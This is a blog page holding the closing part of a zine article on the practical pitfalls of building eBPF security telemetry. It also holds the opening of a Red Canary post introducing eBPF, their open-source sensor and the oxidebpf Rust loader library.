|
| +-**- I hope you find constraints fun. -**-
| |
| | -...- Problem -...-
| |
| | Are you one of the dozen or so people unreasonably upset that `0x10c`[10] was
| | never released? Me too! I find working within constraints challenging and
| | enjoyable. And let me tell you, BPF programs have a lot of constraints.
| |
| | You get 512 bytes of stack space for your program, half a kilobyte. This
| | doesn't appear to be something that has or will ever change. It's also unclear
| | if this applies to tail calls. Some documentation implies that tail calls use
| | the same stack space, so you're limited to 512 bytes total, but in practice it
| | seems to be 512 bytes per program. And `clang` probably won't be able to help
| | you. BPF programs, for whatever reason, don't like to reclaim stack space. Your
| | variables will get hoisted and instantiated at the start of execution. If you
| | want to do things like dump syscall arguments or `pt_regs`, especially when
| | working with strings, you'll find yourself running out of stack space very
| | quickly.
| |
| | There's a practical instruction limit of about 4096 instructions. The
| | instruction limit in the past was set (as far as I can tell) based on what the
| | verifier could verify before declaring "this has gone on too long, I can't
| | verify this won't halt, so I'm failing it." You can get more instructions by
| | manipulating the verifier, and doing other tricks you'll find in the mailing
| | lists, if you really want to put in the effort. Newer verifiers let you get
| | upwards of 1,000,000 instructions, but that'll only help you if you're
| | supporting newer kernels.
| |
| | -...- Solution -...-
| |
| | To work around the instruction limit, you can use tail calls. Tail calls are
| | the closest BPF has to a true function call. You transfer flow over to
| | whichever program you call into. You can chain tail calls like this together up
| | to 33 times. There are some caveats, which we'll get to later.
| |
| | There are a few tricks you can use to work around the stack limit. One trick is
| | to explicitly reuse stack space. For example, reusing variables or
| | instantiating a struct of bytes to act as your scratch space and manually
| | reusing offsets within it. Another trick is to build your own stack with maps.
| | On some kernel versions you can request a struct from a map and get a pointer
| | to it. If the requested struct doesn't exist (e.g., the array map at the
| | requested index was empty) you'll still get back a pointer to an empty struct
| | that you can manipulate. Other kernel versions require this map-struct to be
| | copied to the stack before being modified, so your mileage may vary.
| |
| | With all that said, I want to offer some practical advice. If the information
| | you're retrieving is too big to ever fit on the stack, you should just send it
| | out as you read it. Create a messaging type and pipeline for chunking and
| | rebuilding data in userspace, copy as much as you can to the stack, and then
| | send it up through a map. This will run on a wider range of kernel versions,
| | and you won't have to worry about if your host kernel allows directly
| | manipulating and emitting map memory. You can reconstruct it in userspace at
| | will. This is what companies like Google are doing for their BPF telemetry.
| +-
|
| +-**- The good stuff is GPL. -**-
| |
| | -...- Problem -...-
| |
| | All the useful helper functions (like `perf_event_output`[6]) are exported as
| | GPL-only. If you want your program to do anything useful, you're going to have
| | to license it under GPL. That makes it hard to make proprietary programs based
| | on BPF. If your program is only internal, and never distributed, you're fine.
| | But if you start distributing your programs (to customers, friends, wherever)
| | you need to publish it under GPL.
| |
| | -...- Solution -...-
| |
| | Short answer: Make the world a better place, release your BPF code and tools.
| |
| | Long answer: BPF is still a niche and complex discipline, so open sourcing your
| | tooling doesn't reduce competitive effectiveness for a business. From an
| | individual perspective, open sourcing your tooling gets your name out there and
| | makes you more valuable as an employee. From an employer perspective, the more
| | accessible BPF becomes the easier it will be to hire people to build and
| | maintain it. From the community perspective, we can all learn from each other
| | by working in the open. Perhaps you have an interesting use case that the
| | maintainers of other libraries would want to know about, or could offer advice
| | on. Everybody wins.
| +-
|
| +-**- By default, you get the default. -**-
| |
| | Alternatively, BPF is only good with containers if you tell it to be.
| |
| | -...- Problem -...-
| |
| | Be careful with the assumptions you make about the information you retrieve
| | from a BPF program. If you grab the retcode of a `fork` call, it's going to
| | give you the retcode of the `fork` call: the pid in the namespace of the
| | calling process. Maybe this is what you wanted, or maybe you really wanted the
| | pid of the child process un-namespaced. Maybe you ask the BPF program to gather
| | the pid (with the `get_pid_tgid` helper). You take the upper 32 bits,
| | corresponding to the pid, but nothing lines up. Well, you're executing in
| | kernelspace which means the `pid` you probably want is actually the `tgid`, and
| | what you got was a `tid`. Unless you wanted a `tid`, in which case you should
| | get the `pid`. The kernelspace understanding of a `pid` is not the same as the
| | userspace understanding of a `pid`. If you want to identify a file, you
| | probably want the inode number and device number, a file descriptor won't be as
| | useful.
| |
| | -...- Solution -...-
| |
| | If you want your program to retrieve information, think about what information
| | you need to retrieve. Make sure you know where that information exists (what
| | structs, where they live in memory, and how to get there) and then find a place
| | (assuming you're launching a kprobe) in the kernel you can attach your program
| | as close to that information as possible. For example, if you really need the
| | root namespace pid of the child process of fork, you probably want to hook
| | somewhere in the path of the new child process so you can grab the `pid` from
| | the `task_struct`.
| |
| | Be aware that this location might change between kernel versions, or the
| | information may take a different form. You may have to choose a less optimal
| | probe point that is available on more systems. Or you may have to change the
| | information you're gathering to something else that exists on all the kernels
| | you support. That leads us to the next two issues.
| +-
|
| +-**- CO-RE (probably) won't help you. -**-
| |
| | -...- Problem -...-
| |
| | The maintainers are constantly adding feature to help BPF developers compile
| | once-run everywhere their BPF programs. Unfortunately, you'll likely find
| | yourself trying to target kernel versions that don't have these features. Or,
| | if you do, since these features are added in piecemeal, it may not have all the
| | CO-RE features you expect.
| |
| | For example, the BTF feature makes it possible to reference struct members
| | directly, even if they've been compiled in a randomized layout, across
| | different kernel versions, and without recompiling. This feature was added in
| | April of 2018[11]. You will probably need to write code for kernels from before
| | April 2018. This means something like `current->real_parent->pid` is not
| | guaranteed to work without recompiling for (or on) the host.
| |
| | -...- Solution -...-
| |
| | There's really no way around this one. It's what we're doing, Microsoft is
| | doing it too for their Linux machines, and I'm sure there are others. First,
| | you determine the offsets of struct members for your desired kernel version and
| | then you load them dynamically into your BPF program at runtime. For example,
| | this code snippet from [12] shows how we read struct offsets from a map and use
| | that in our `bpf_probe_read` to retrieve values.
| |
| | ```c
| | static __always_inline int read_value(
| | void *base, u64 offset, void *dest, size_t dest_size
| | )
| | {
| | /* null check the base pointer first */
| | if (!base)
| | return -1;
| |
| | u64 _offset = (u64)bpf_map_lookup_elem(&offsets, &offset);
| | if (_offset)
| | {
| | return bpf_probe_read(dest, dest_size, base + *(u32 *)_offset);
| | }
| | return -1;
| | }
| | ```
| |
| | To actually find these offset values in the first place, we built the
| | `linux-kernel-component-cloud-builder`, or `LKCCB`, which builds hundreds if
| | not thousands of kernel modules with debug enabled for all our target kernel
| | versions and extracts structure offset information from the LKM's `DWARF` debug
| | info[1].
| +-
|
| +-**- Stable interfaces aren't. -**-
| |
| | -...- Problem -...-
| |
| | You'll often find, when working with the kernel, that there aren't as many
| | stable interfaces as you thought there'd be. Even syscalls, which are supposed
| | to be a big part of the stable user interface, aren't necessarily stable.
| |
| | For example, if you somehow traveled back in time and wanted to monitor process
| | forks, you'd probe the `fork` syscall. That'd work fine for a bit, until
| | `clone` is introduced. If you stopped paying attention, you'd lose your data
| | altogether when glibc (and everything with it) switched `fork()` to be a
| | wrapper around `clone()`.
| |
| | Maybe you want to get the arguments of a syscall. Should be easy, you're given
| | `pt_regs`, just access the registers that hold the arguments! Except if you're
| | on x86_64, and on a kernel older than 4.17, you'll probably be given the
| | `pt_regs` of the syscall wrapper function, that in turn calls the real syscall
| | function. And of course, it all shuffles around if you need to add aarch64
| | support, which has its own set of calling conventions.
| |
| | Sometimes a symbol that's marked as being exported can't be attached to, almost
| | inexplicably. Usually this is due to GCC inlining the function, and the symbol
| | being renamed to something like `symbol_name.part.1213`. Trying to bind
| | `symbol_name` won't work.
| |
| | -...- Solution -...-
| |
| | For different architectures you can probably get away with macros that
| | conditionally compile depending on what architecture you're targeting, and then
| | building one copy per architecture. For the syscall wrappers, you can do
| | something similar but build targeting different kernel versions. In practice,
| | you may find you need many variants and copies of a single program, all with
| | slight differences, to support different kernels and architectures.
| |
| | For the symbol name problem, it comes back to run early and run often. It's
| | often worth spinning up a VM of a few of the kernels you're targeting and
| | double checking that the locations you're hooking are indeed in
| | `/proc/kallsyms`. Sometimes you'll find the functions you were looking at don't
| | exist in different versions, or have been renamed and relocated. I recommend
| | getting comfortable with Bootlin's Elixir cross referencer (but you still need
| | to run and see, because distros do their own backports which won't match what's
| | in the mainline cross referencer).
| +-
|
| +-**- Running BPF programs as intended involves magic. -**-
| |
| | -...- Problem -...-
| |
| | If you use libbcc, libbpf, bpftrace, or any other other high level BPF tools
| | you'll quickly notice that they do a lot of magic for you. BCC (the python
| | interface) will more or less rewrite your programs for you so they work on your
| | host system. You'll end up getting error messages on code that the library
| | wrote for you. They also help you get around CO-RE limitations by compiling on
| | the host, and using different tricks and kludges to get the same program code
| | to operate in many environments as cleanly as possible. This doesn't help a ton
| | when you need to build and distribute actual raw BPF programs in their own ELF
| | file.
| |
| | These libraries are also pretty convoluted. There's a lot of overlap in
| | maintainers between these libraries and the people working on BPF in the
| | kernel, so documenting the interactions isn't a priority. But you don't
| | actually need all the stuff these libraries are doing. After a while,
| | especially with the rewriting, you'll find yourself wanting to write and load
| | pure BPF C code. Here's a snippet of a map I put together when trying to figure
| | out what syscalls were actually being made when libbpf loaded a program.
| |
| | ```
| | KProbe
| | |-> bpf_attach_kprobe()
| | |-> bpf_attach_probe()
| | |-> bpf_try_perf_event_open_with_probe()
| | |-> bpf_find_probe_type()
| | |-> bpf_get_retprobe_bit()
| | |-> syscall(__NR_perf_event_open)
| | |-> create_probe_event()
| | |-> enter_mount_ns()
| | |-> setns()
| | |-> exit_mount_ns()
| | |-> setns()
| | |-> bpf_attach_tracing_event()
| | |-> ioctl( PERF_EVENT_IOC_SET_BPF )
| | |-> ioctl( PERF_EVENT_IOC_ENABLE )
| | |-> bpf_close_perf_event_fd()
| | |-> ioctl( PERF_EVENT_IOC_DISABLE )
| | ```
| |
| | These libraries are also GPL, which means your userspace program would end up
| | being licensed under GPL and not just your BPF programs. As great as this is
| | for users, if you work for a company that likes to make money you might not be
| | allowed to touch GPL. It might even be in your contract.
| |
| | -...- Solution -...-
| |
| | If you're writing complex BPF programs for security, you'll probably want to
| | write it in C without the "help" of something like BCC. You'll also want a bit
| | more control and transparency when loading and attaching your programs. In my
| | experience, libbpf wasn't great at cleaning up after itself and it got
| | frustrating.
| |
| | Use a clean, simple, library built from the ground up for loading BPF in your
| | language of choice. For Rust, `aya`[16] is a good one, and I worked on
| | `oxidebpf`[0]. Golang also has some good options. One common theme of these
| | projects is the amount of effort that went into reverse engineering the
| | undocumented program loading logic and reimplementing it. Take advantage of
| | that work and use it to load your programs. They're also permissively licensed!
| +-
|
| +-**- Speed kills. -**-
| |
| | -...- Problem -...-
| |
| | After getting into BPF, you may benchmark a few of your programs and be
| | surprised at how much faster BPF is than what you've been using before, like
| | audit. This makes it very tempting to trace and probe more than you probably
| | should. For example, if you want to trace socket closes you may be tempted to
| | put a kprobe on the `close` syscall. This syscall is called all the time, and
| | probing it will slow your system down unnecessarily. Most of the messages will
| | be discarded since you only care about sockets. There are plenty of other
| | interesting areas that can't be reasonably instrumented due to the performance
| | impact.
| |
| | -...- Solution -...-
| |
| | Trace only what you need, and scope it down as much as possible. Going back to
| | the `close` example, you'd be better off probing somewhere downstream where the
| | individual `tcp_close` or `udp_close` functions are called.
| |
| | ```
| | struct proto tcp_prot = {
| | // ...
| | .close = tcp_close,
| | // ...
| | };
| | EXPORT_SYMBOL(tcp_prot);
| |
| | struct proto udp_prot = {
| | // ...
| | .close = udp_lib_close,
| | // ...
| | };
| | EXPORT_SYMBOL(udp_prot);
| | ```
| |
| | Brendan Gregg's book[7], again, has a great table that shows the overall
| | performance impact of tracing different points in the kernel. You could also
| | just reason intuitively about how often you think each area you want to probe
| | is exercised. The more commonly a code path is executed, the more expensive it
| | will be to probe it.
| |
| | Even after doing your best to scope down and optimize your BPF programs, you'll
| | probably want to run benchmarks as you tweak things to see what performs best
| | in your target environment. Flamegraphs[13] are a great way to see where most
| | of your overhead is coming from, especially if combined with a benchmarker like
| | UnixBench[14]. The results may surprise you.
| |
| | I'd also recommend processing BPF events in batches. You'll probably be sending
| | out a lot of information through maps that needs to be read from userspace. If
| | you're getting information that's too big for the stack, the information will
| | be sent in chunks that need to be reconstructed in userspace. It's definitely
| | possible to loop a blocking poll+read on the perfmap or BPF ring buffer, but
| | doing so will result in significant overhead. You're much better off letting
| | the buffers fill a bit, and processing them in batches (batch process, don't
| | stream process). Doing that netted me significant performance gains in
| | benchmarks for the BPF programs I write at work.
| +-
|
| +-**- Don't Panic. -**-
| |
| | -...- Problem -...-
| |
| | BPF programs will generally live as long as something holds a file descriptor
| | that points to them. However, sometimes you need to manually clean up after
| | them (such as when using `debugfs`). If your userspace program crashes or
| | panics things may not get cleaned up properly. This can lead to all sorts of
| | problems when you restart your probes, such as receiving duplicate events.
| |
| | If you're building short lived, one off, tools this is less of a concern. But
| | if you're managing several probes as part of a long-lived monitoring daemon
| | then this is something you need to be careful with.
| |
| | -...- Solution -...-
| |
| | Make sure you design the userspace component of the BPF program to keep your
| | programs alive for as long as you'll need them. Gracefully handle all errors in
| | the thread that keeps your BPF programs alive and make sure you clean up after
| | yourself in the event of failure or shutdown. Keep in mind that many older BPF
| | tools are built around short-lived programs, meant for things like `bpftrace`
| | or production debugging.
| +-
|
| +-**- Know your limits. -**-
| |
| | -...- Problem -...-
| |
| | Your program will have instructions and will probably use maps. These take up
| | space, which the BPF syscall will handily memlock for you. On many distros,
| | this is fine. On others, however, the default memlock ulimit is quite low[15].
| | See the following output of `ulimit -l` on various distributions.
| |
| | ```
| | vagrant@ubuntu2004:~$ ulimit -l
| | 65536
| | [vagrant@centos7 ~]$ ulimit -l
| | 64
| | vagrant@opensuse15:~> ulimit -l
| | 64
| | ```
| |
| | If you can't memlock enough memory to fit your instructions and maps, you'll
| | get rejected with cryptic verifier error messages.
| |
| | -...- Solution -...-
| |
| | Calculate the amount of memory your programs and maps will need, and check the
| | memlock limits on your target systems. You may be fine, or you may need to
| | raise it first. Some libraries (like the one we wrote![0]) can try to take care
| | of this for you.
| +-
|
| +-**- Tail calls aren't guaranteed. -**-
| |
| | -...- Problem -...-
| |
| | Think of tail calls like the BPF equivalent of `execve`, except less powerful.
| | It'll start running a new probe, with the original context argument, and
| | replace everything you were previously doing. You can't provide it with custom
| | arguments, and the tail call needs to pass the verifier independently. This
| | means if you want to communicate between tail calls you'll need to use maps.
| | You're also limited to chaining 33 tail calls in a single execution, after that
| | the tail call execution will simply fall through.
| |
| | You can't call into another program with a tail call directly, either. You need
| | to reference an index in a tail call program map (a type of BPF map) which
| | needs to be set from userspace. For example, if you want to tail call from
| | `prog_a()` into `prog_b()`, you'll need to load `prog_a()` and `prog_b()`
| | first. At this point if `prog_a()` fires, the tail call into `prog_b()` will
| | fizzle. Then, from userspace, you need to update a map to say "`prog_b()` is at
| | index 5, if anyone tries to tail call into index 5, send them to `prog_b()`."
| | Tracking and maintaining all these indexes can be cumbersome.
| |
| | And there's not always a guarantee that the tail call will fire. You could
| | reach an execution limit, or a memory limit, or some other weird verifier edge
| | case that prevents the tail call from firing. Your programs need to handle this
| | gracefully.
| |
| | -...- Solution -...-
| |
| | First, you'll have to write your tail calls as though they were independent
| | programs. Think of designing each one to grab a different bit of information
| | you're looking for. If you find yourself re-calculating the same things in each
| | program or otherwise need to communicate across calls, store and retrieve
| | information from a map.
| |
| | For managing indexes, use an enum for your tail calls and reference that from
| | your userspace application. For example, have an `enum tail_calls { PROBE_A,
| | PROBE_B };` and then reference it from inside your programs and when loading
| | the program map from userspace. The file descriptor for `probe_a()` goes at
| | index `PROBE_A`, and so on. If you want to call into `probe_a()`, you get there
| | by asking for `PROBE_A` with `bpf_tail_call(ctx, &tail_call_table, PROBE_A);`.
| |
| | Your program should also have a plan for what happens if the tail call doesn't
| | go off. Do you want to send up an error? Ignore it? Send up a message that
| | execution was completed? Something else? For example, if you're using recursive
| | tail calls to read a string value you may want to return a message that says
| | you hit your tail call limit before you finished reading the string.
| +-
|
| +-**- You can't just return what you want. -**-
| |
| | Alternatively, you're on your own with error handling.
| |
| | -...- Problem -...-
| |
| | This one was a problem that we didn't even realize we had because it was so
| | subtle. In C it's pretty customary to return `0` on success and `-1` (or some
| | other negative error code) in the event of a failure. The actual returned value
| | is usually written to a buffer or some other pointer given as a function
| | parameter. You check the return code for success or failure and take actions
| | appropriately (in theory). While writing BPF programs in C, especially kprobes,
| | you might be tempted to follow this pattern. After all, it makes sense. The
| | actual value you return is sent out through perf or written into a map so
| | userspace can grab it, so the return value of the probe itself should be `0` to
| | indicate success or `-1` to indicate failure, right? Just like every other C
| | program? Wrong! For program types other than kprobes (remember, BPF is just an
| | execution environment) it's more obvious that the return codes have special
| | meaning. For example, XDP programs have explicit return codes to drop, pass,
| | or re-process packets.
| |
| | For kprobes, `return 0;` means "I'm done with this kprobe, you can move on."
| | You indicate that you want to keep the probe hanging around with _literally any
| | other return code_ (including `return -1;`). That's probably not what you
| | want. Take a look at this function from the kprobe handler in [18]:
| |
| | ```c
| | /* Kprobe profile handler */
| | static int
| | kprobe_perf_func(struct trace_kprobe *tk, struct pt_regs *regs)
| | {
| | // ...
| | if (bpf_prog_array_valid(call)) {
| | // ...
| | ret = trace_call_bpf(call, regs);
| | // ...
| | if (!ret)
| | return 0;
| | }
| |
| | head = this_cpu_ptr(call->perf_events);
| | if (hlist_empty(head))
| | return 0;
| |
| | dsize = __get_data_size(&tk->tp, regs);
| | __size = sizeof(*entry) + tk->tp.size + dsize;
| | size = ALIGN(__size + sizeof(u32), sizeof(u64));
| | size -= sizeof(u32);
| |
| | entry = perf_trace_buf_alloc(size, NULL, &rctx);
| | if (!entry)
| | return 0;
| |
| | entry->ip = (unsigned long)tk->rp.kp.addr;
| | memset(&entry[1], 0, dsize);
| | store_trace_args(&entry[1], &tk->tp, regs, sizeof(*entry), dsize);
| | perf_trace_buf_submit(entry, size, rctx, call->event.type, 1, regs,
| | head, NULL);
| | return 0;
| | }
| | ```
| |
| | There's two things you should notice in that snippet. The line `ret =
| | trace_call_bpf(call, regs);` and `if (!ret) return 0;`. That means if
| | `trace_call_bpf()` returns _anything but `0`_ (including `-1`) we go through
| | the remainder of the function, buffer allocation, trace argument storage, and
| | so on. We can grab the internals of that function at [19]:
| |
| |
| | ```c
| | /**
| | * trace_call_bpf - invoke BPF program
| | * @call: tracepoint event
| | * @ctx: opaque context pointer
| | *
| | * kprobe handlers execute BPF programs via this helper.
| | * Can be used from static tracepoints in the future.
| | *
| | * Return: BPF programs always return an integer which is interpreted by
| | * kprobe handler as:
| | * 0 - return from kprobe (event is filtered out)
| | * 1 - store kprobe event into ring buffer
| | * Other values are reserved and currently alias to 1
| | */
| | unsigned int trace_call_bpf(struct trace_event_call *call, void *ctx)
| | {
| | unsigned int ret;
| |
| | // ...
| |
| | /*
| | * ...
| | */
| | ret = BPF_PROG_RUN_ARRAY(call->prog_array, ctx, bpf_prog_run);
| |
| | // ...
| |
| | return ret;
| | }
| | ```
| |
| | As you can see, this is the function that actually invokes the kprobe. It gets
| | `ret`, which it returns, from `BPF_PROG_RUN_ARRAY()` which, as you might
| | expect, runs the BPF program. The documentation on this function is also pretty
| | explicit, which is nice. When we return `0`, we've returned from the kprobe and
| | don't need to keep any details about it hanging around. When we return `1`
| | (which anything besides `0` aliases to) we store information about the kprobe
| | in a ringbuffer for later.
| |
| | -...- Solution -...-
| |
| | The solution here is to always `return 0;` in your kprobes, unless you have an
| | explicit need to `return 1;`. If you want to know if your kprobe failed or is
| | in some incomplete state, you'll need to architect your message-passing to
| | handle that case. For example, you might want to include a success code flag in
| | the struct(s) you pass through a perfmap which you can check for failure. Or
| | you might want to build your system around a best-effort event reconstruction
| | for more complicated returns involving multiple messages. In any case, you'll
| | have to engineer your error checking and handling independently of the BPF VM
| | system. Those return codes are reserved, you gotta make your own.
| +-
+-
+-#- Wow, that looks hard. Can you summarize it for me? -#-
|
| Certainly! BPF is really good at getting visibility (almost) anywhere in the
| entire system, it allows dynamic reinstrumentation, can be made container
| aware, is faster than alternatives, and is (usually) safe to run as long as you
| can load it. Consider using BPF if any of the following apply to you:
|
| - You have the in-house resources and expertise to build and maintain a
| long-lived BPF telemetry source.
|
| - You only want to use BPF for live debugging or other short-lived, one off, use
| cases such as bpftrace.
|
| - You're lucky enough to only have to support a single kernel version.
|
| - You don't really care if the project succeeds, you just want to get experience
| with BPF (this might legitimately apply in R&D orgs).
|
| If you don't have the resources and need to support a wide range of kernels,
| you might be better off looking for an alternative (there are many free and
| open source options thanks to GPL), or paying someone else to build it for you.
|
| Long running BPF programs for security are a relatively new use case. The
| tooling around this use case is getting better all the time, but there's still
| a lot to consider before diving in.
+-
+------[references]--------------------------------------------------------------------------+
| [0]: [https://github.com/redcanaryco/oxidebpf] |
| [1]: Will go public Soon(TM) at |
| [https://github.com/redcanaryco/linux-kernel-cloud-component-builder] |
| [2]: [https://github.com/redcanaryco/redcanary-ebpf-sensor] |
| [4]: [https://lwn.net/Articles/870269/] |
| [5]: [https://lwn.net/Articles/812503/] |
| [6]: [https://elixir.bootlin.com/linux/latest/source/kernel/trace/bpf_trace.c#L646] |
| [7]: [https://www.brendangregg.com/bpf-performance-tools-book.html] |
| [8]: [https://github.com/vbpf/ebpf-verifier] |
| [9]: [https://github.com/iovisor/bcc/issues] |
| [10]: [https://en.wikipedia.org/wiki/0x10c] |
| [11]: [https://lwn.net/Articles/752047/] |
| [12]: [https://github.com/redcanaryco/redcanary-ebpf-sensor/blob/main/src/programs.c#L393] |
| [13]: [https://github.com/brendangregg/FlameGraph/] |
| [14]: [https://github.com/kdlucas/byte-unixbench] |
| [15]: [https://linux.die.net/man/5/limits.conf] |
| [16]: [https://github.com/aya-rs/aya] |
| [17]: [https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=BPF] |
| [18]: [https://elixir.bootlin.com/linux/latest/source/kernel/trace/trace_kprobe.c#L1568] |
| [19]: [https://elixir.bootlin.com/linux/latest/source/kernel/trace/bpf_trace.c#L95] |
+--------------------------------------------------------------------------------------------+
</code></pre></div></div>Friday OrtizThis article was originally written for tmp.0ut volume 2 and is available here: https://tmpout.sh/2/4.html. Due to the unique (read: badass) format of the zine, it is replicated here as plaintext.eBPF for security: a beginner’s guide2022-01-04T05:00:00+00:002022-01-04T05:00:00+00:00https://ortiz.sh/ebpf/2022/01/04/eBPF-FOR-BEGINNINERS<p><strong>This post was written for Red Canary and originally appeared on their site
<a href="https://redcanary.com/blog/ebpf-for-security/">here</a>.</strong></p>
<p>Red Canary has started to incorporate
<a href="https://en.wikipedia.org/wiki/Berkeley_Packet_Filter">eBPF</a> into our Linux
sensor. We wanted to explain, at a high level, what eBPF is and how it helps us
protect our customers. We’ll start by describing the shortcomings we’ve
experienced in gathering security telemetry and then explain how eBPF helps us
solve these shortcomings. We’ll close by reviewing some of the challenges we
faced in building eBPF support into our
<a href="https://redcanary.com/products/managed-detection-and-response/">MDR</a> product,
and how we overcame them. We expect to offer Red Canary customers full eBPF
telemetry support in the coming months, which will be announced in upcoming
release notes.</p>
<h2 id="whats-the-problem">What’s the problem?</h2>
<p>In order to detect suspicious or malicious events, we need to gather a lot of
telemetry from a running system. We use this telemetry to understand what
system calls are happening, what processes are running, and how the system is
behaving. Some examples of telemetry we gather are process start events,
network connections, and namespace changes. There are <a href="https://redcanary.com/blog/linux-security-testing/">many
ways</a> we can gather this
information on a <a href="https://redcanary.com/blog/linux-101/">Linux system</a>, but
they are not all created equal. For example, we can gather information on
processes opening files by regularly scanning <code class="language-plaintext highlighter-rouge">procfs</code> for open file
descriptors. However, depending on our intervals, we might miss files that are
opened and closed quickly. Or we could note down the file descriptor, only to
have it point at a different file by the time we read it.</p>
<p>The ideal place to gather information on these events is directly inside the
kernel. Traditionally, this can be done with the <a href="https://wiki.archlinux.org/title/Audit_framework">Linux Auditing
subsystem</a> or with a <a href="https://sysprog21.github.io/lkmpg/#what-is-a-kernel-module">Linux
kernel module
(LKM)</a>. An
alternative that’s quickly gaining traction is to gather this telemetry with
eBPF, which excels at high-performance kernel instrumentation and improved
observability.</p>
<h2 id="what-is-ebpf-and-why-is-it-useful">What is eBPF and why is it useful?</h2>
<p><a href="https://ebpf.io/">Berkeley Packet Filter</a> is a Linux kernel subsystem that
allows a user to run a limited set of instructions on a virtual machine running
in the kernel. It is divided between classic BPF (cBPF) and extended BPF (eBPF,
or simply BPF). The older cBPF was limited to observing packet information,
while the newer eBPF is much more powerful, allowing a user to do things such
as modify packets, change syscall arguments, modify userspace applications, and
more.</p>
<h3 id="safer-than-kernel-modules">Safer than kernel modules</h3>
<p>Why is this useful? Because normally if we want to run arbitrary code in the
kernel, we would need to load in a kernel module. Putting aside the security
implications for a moment, running code in the kernel is dangerous and error
prone. If you make a mistake in a normal application, it crashes. If you make a
mistake in kernel code, the computer crashes. Security is about managing
business risk, so a security tool isn’t very useful if it brings down
production. BPF offers us a safe alternative, while providing nearly the same
amount of power. You can run arbitrary code in a kernel sandbox and collect
information without the risk of breaking the host.</p>
<p>You can also think of BPF as a web application, whereas a kernel module is a
standalone application. Which one do you trust more: visiting a website or
downloading and running an application? Visiting a website is safer; a web
application runs in a sandbox and can’t easily do as much damage to your
machine as a downloaded application.</p>
<h3 id="more-efficient-than-auditd">More efficient than AuditD</h3>
<p><a href="https://capsule8.com/blog/auditd-what-is-the-linux-auditing-system/">This
post</a>
gives an excellent overview of <a href="https://linux.die.net/man/8/auditd">AuditD</a>’s
strengths and weaknesses, but let’s compare it directly against BPF.</p>
<p>AuditD is relatively slow when it comes to collecting information, and incurs a
non-negligible performance penalty on the system under audit. BPF offers us a
significant performance advantage: we can perform some filtering, collection,
and analysis within the kernel. Moving information from inside the kernel to
outside the kernel is a relatively slow process (details of which are outside
the scope of this post). The more work, collection, and analysis we can do
inside the kernel, the faster our system will run.</p>
<p>AuditD is also relatively inflexible, whereas BPF gives us great flexibility.
AuditD telemetry is limited to the events that the tool is designed to
generate, and what we can configure it to tell us about. With BPF, we can
instrument and inspect any point in the kernel we want to. We can look at
specific code paths, examine function arguments, and generally collect as much
information as we need to inform decision making.</p>
<p>BPF also allows many simultaneous consumers, allowing us to happily live
alongside any other programs that take advantage of BPF. By contrast, AuditD
can only be used by one program at a time. Once events are consumed from
AuditD, they’re gone.</p>
<h2 id="how-do-i-collect-telemetry-from-ebpf">How do I collect telemetry from eBPF?</h2>
<p>In order to get security telemetry from BPF, we need two main components:</p>
<ol>
<li>the BPF programs themselves, to gather information from the kernel and
expose it in a useful format</li>
<li>a way to load and interact with these BPF programs</li>
</ol>
<p>Red Canary’s Research & Development team has built and released both of these
components as free open source software. With these components in place, anyone
can start to move away from relying on AuditD and Linux kernel modules to
gather security telemetry.</p>
<h3 id="red-canarys-ebpf-sensor">Red Canary’s eBPF sensor</h3>
<p>The
<a href="https://github.com/redcanaryco/redcanary-ebpf-sensor">redcanary-ebpf-sensor</a>
is the set of BPF programs that actually gather security relevant event data
from the Linux kernel. The BPF programs are combined into a single ELF file
from which we can selectively load individual probes, depending on the
operating system and kernel version we’re running on. The probes insert
themselves at various points in the kernel (such as the entrypoint and return
of the <code class="language-plaintext highlighter-rouge">execve</code> system call) and gather information on the call and its
context. This information is then turned into a telemetry event, which is sent
to userspace through a <code class="language-plaintext highlighter-rouge">perf</code> buffer.</p>
<p>By having multiple probes in the same ELF binary, we can take advantage of
newer kernel features (such as the <code class="language-plaintext highlighter-rouge">read_str</code> family of BPF functions), or probe
newer syscalls (such as <code class="language-plaintext highlighter-rouge">clone3</code>) while retaining backwards compatibility with
older kernels. This lets us build a Compile-Once, Run-Most-Places BPF sensor
package.</p>
<h3 id="oxidebpf">oxidebpf</h3>
<p><a href="https://github.com/redcanaryco/oxidebpf"><code class="language-plaintext highlighter-rouge">oxidebpf</code></a> is a Rust library that
manages eBPF programs. The goal of <code class="language-plaintext highlighter-rouge">oxidebpf</code> is to provide a simple interface
for managing multiple BPF program versions in a Compile-Once, Run-Most-Places
way. For example, here’s how easy it is to build a probe that attaches to
<code class="language-plaintext highlighter-rouge">clone3</code> and <code class="language-plaintext highlighter-rouge">clone</code>, but only if <code class="language-plaintext highlighter-rouge">clone3</code> exists on the target system.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="k">mut</span> <span class="n">program_group</span> <span class="o">=</span> <span class="nn">ProgramGroup</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nb">None</span><span class="p">);</span>
<span class="n">program_group</span><span class="nf">.load</span><span class="p">(</span>
<span class="n">program_blueprint</span><span class="p">,</span>
<span class="nd">vec!</span><span class="p">[</span><span class="nn">ProgramVersion</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nd">vec!</span><span class="p">[</span>
<span class="nn">Program</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span>
<span class="s">"test_program_clone"</span><span class="p">,</span>
<span class="o">&</span><span class="p">[</span><span class="s">"sys_clone"</span><span class="p">],</span>
<span class="p">)</span>
<span class="nf">.syscall</span><span class="p">(</span><span class="kc">true</span><span class="p">),</span>
<span class="nn">Program</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span>
<span class="s">"test_program_clone3"</span><span class="p">,</span>
<span class="o">&</span><span class="p">[</span><span class="s">"sys_clone3"</span><span class="p">],</span>
<span class="p">)</span>
<span class="nf">.optional</span><span class="p">(</span><span class="kc">true</span><span class="p">)</span>
<span class="nf">.syscall</span><span class="p">(</span><span class="kc">true</span><span class="p">),</span>
<span class="p">])]</span>
<span class="p">)</span><span class="o">?</span><span class="p">;</span>
</code></pre></div></div>
<p>Read our <a href="https://redcanary.com/blog/oxidebpf/">blog post</a> for a more detailed
overview of <code class="language-plaintext highlighter-rouge">oxidebpf</code>, along with a tutorial.</p>
<p><strong>Author’s Note: That blog post is also cross posted here:
<a href="https://ortiz.sh/ebpf/2021/11/01/INTRODUCING-OXIDEBPF.html">https://ortiz.sh/ebpf/2021/11/01/INTRODUCING-OXIDEBPF.html</a>.
The tutorial is not updated for oxidebpf versions >= 0.2.</strong></p>
